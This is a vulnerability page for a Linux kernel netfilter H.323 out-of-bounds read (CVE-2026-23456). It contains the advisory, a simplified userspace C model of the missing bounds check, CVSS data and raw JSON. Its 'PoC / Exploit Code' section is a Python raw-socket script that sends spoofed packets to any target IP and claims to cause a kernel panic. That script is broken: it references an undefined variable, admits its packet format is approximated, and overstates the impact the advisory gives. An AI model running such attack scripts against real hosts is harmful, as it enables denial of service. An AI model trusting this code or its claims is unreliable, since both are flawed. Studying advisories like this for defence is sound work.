Security Vulnerability Report
CVE-2026-23456 CVSS 8.2 HIGH

CVE-2026-23456

Published: 2026-04-03 16:16:32
Last Modified: 2026-04-27 14:16:34
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

netfilter: nf_conntrack_h323: fix OOB read in decode_int() CONS case

In decode_int(), the CONS case calls get_bits(bs, 2) to read a length value, then calls get_uint(bs, len) without checking that len bytes remain in the buffer. The existing boundary check only validates the 2 bits for get_bits(), not the subsequent 1-4 bytes that get_uint() reads. This allows a malformed H.323/RAS packet to cause a 1-4 byte slab-out-of-bounds read.

Add a boundary check for len bytes after get_bits() and before get_uint().
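
The missing check described above, as an added example: a simplified userspace C model of the CONS case, not the kernel's source. The struct layout, past_end(), decode_cons(), run_sample() and the sample bytes are assumptions made for illustration; bytes beyond the declared message length stand in for adjacent slab memory so the over-read can be observed safely.

```c
#include <stddef.h>
#include <stdint.h>
#define ERR_BOUND (-1)

/* Simplified model of the decoder's bit cursor; the layout is an assumption. */
struct bitstr { const uint8_t *cur, *end; unsigned int bit; };

/* Nonzero if `bits` bits plus `bytes` bytes from the cursor would pass bs->end. */
static int past_end(const struct bitstr *bs, size_t bytes, size_t bits)
{
    bits += bs->bit;
    bytes += bits / 8 + (bits % 8 ? 1 : 0);
    return bytes > (size_t)(bs->end - bs->cur);
}

/* Read n bits MSB-first; the caller has already checked bounds. */
static unsigned int get_bits(struct bitstr *bs, unsigned int n)
{
    unsigned int v = 0;
    while (n--) {
        v = (v << 1) | ((*bs->cur >> (7 - bs->bit)) & 1u);
        if (++bs->bit == 8) { bs->bit = 0; bs->cur++; }
    }
    return v;
}

/* CONS case: a 2-bit field selects len (1..4), then len aligned bytes hold the
 * integer. with_fix=0 models the pre-patch flow, with_fix=1 the patched one.
 * Returns bytes consumed past bs->end (0 = in bounds) or ERR_BOUND. */
int decode_cons(struct bitstr *bs, uint32_t *out, int with_fix)
{
    if (past_end(bs, 0, 2))                  /* existing check: the 2 bits only */
        return ERR_BOUND;
    unsigned int len = get_bits(bs, 2) + 1;
    if (bs->bit) { bs->bit = 0; bs->cur++; } /* byte-align */
    if (with_fix && past_end(bs, len, 0))    /* added check: the len bytes */
        return ERR_BOUND;
    uint32_t v = 0;
    for (unsigned int i = 0; i < len; i++)   /* stands in for get_uint(bs, len) */
        v = (v << 8) | bs->cur[i];
    *out = v;
    bs->cur += len;
    return bs->cur > bs->end ? (int)(bs->cur - bs->end) : 0;
}

/* Constructed sample: 0xC0 selects len=4; trailing bytes model adjacent memory. */
static const uint8_t sample[8] = {0xC0, 0x11, 0x22, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE};
int run_sample(size_t msg_len, int with_fix, uint32_t *out)
{
    struct bitstr bs = { sample, sample + msg_len, 0 };
    return decode_cons(&bs, out, with_fix);
}
```

Calling run_sample() with a message length shorter than 5 and with_fix=0 returns how many bytes were taken from beyond the message, which is the 1-4 byte over-read the description refers to.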

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel < 6.8
Linux Kernel < 6.6
Linux Kernel < 6.1
Linux Kernel < 5.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2026-23456: Linux Kernel nf_conntrack_h323 OOB Read
This script sends a crafted H.323/RAS packet to trigger the kernel panic.
Target: Linux system with nf_conntrack_h323 module loaded and listening on port 1719.
"""
import socket
import struct
import sys


def create_malformed_h323_packet():
    """
    Constructs a basic UDP packet with a payload designed to trigger the
    OOB read in the decode_int() CONS case.
    Note: Specific H.323 ASN.1 structure is approximated to demonstrate the concept.
    """
    # UDP Header (Source Port: 12345, Dest Port: 1719 - RAS)
    src_port = 12345
    dst_port = 1719
    udp_header = struct.pack('!HHHH', src_port, dst_port, 8, 0)  # Length 8, Checksum 0

    # Malformed Payload
    # The goal is to hit the CONS case where get_bits reads a length,
    # but the buffer is too short for get_uint.
    # We inject a length byte that claims more data exists.
    payload = b'\x27\x00'  # Generic H.323 header start
    payload += b'\x04'     # Tag potentially leading to CONS decode
    payload += b'\xFF'     # Malformed length indicator
    return udp_header + payload


def send_packet(target_ip):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
        # IP Header construction
        ip_header = struct.pack('!BBHHHBBH4s4s',
                                0x45,                    # Version/HL
                                0,                       # TOS
                                20 + 8 + len(payload),   # Total Length
                                12345,                   # ID
                                0,                       # Frag
                                64,                      # TTL
                                17,                      # Protocol (UDP)
                                0,                       # Checksum (0 for raw socket calc)
                                socket.inet_aton("192.168.1.100"),  # Src IP (spoofed)
                                socket.inet_aton(target_ip))        # Dst IP
        packet = ip_header + create_malformed_h323_packet()
        sock.sendto(packet, (target_ip, 0))
        print(f"[+] Malformed packet sent to {target_ip}")
    except PermissionError:
        print("[-] Error: Raw sockets require root privileges.")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <TARGET_IP>")
    else:
        send_packet(sys.argv[1])
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23456", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-03T16:16:32.300", "lastModified": "2026-04-27T14:16:34.073", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conntrack_h323: fix OOB read in decode_int() CONS case\n\nIn decode_int(), the CONS case calls get_bits(bs, 2) to read a length\nvalue, then calls get_uint(bs, len) without checking that len bytes\nremain in the buffer. The existing boundary check only validates the\n2 bits for get_bits(), not the subsequent 1-4 bytes that get_uint()\nreads. This allows a malformed H.323/RAS packet to cause a 1-4 byte\nslab-out-of-bounds read.\n\nAdd a boundary check for len bytes after get_bits() and before\nget_uint()."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "references": [{"url": "https://git.kernel.org/stable/c/1e3a3593162c96e8a8de48b1e14f60c3b57fca8a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/41b417ff73a24b2c68134992cc44c88db27f482d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/52235bf88159a1ef16434ab49e47e99c8a09ab20", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/6bce72daeccca9aa1746e92d6c3d4784e71f2ebb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": 
"https://git.kernel.org/stable/c/774a434f8c9c8602a976b2536f65d0172a07f4d2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/a2cd54b9348e485d338b3c132338a4410c99afaf", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c95dc674ebf01ecfb40388b6facfc89b81fed3b7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/fb6c3596823ec5dd09c2123340330d7448f51a59", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}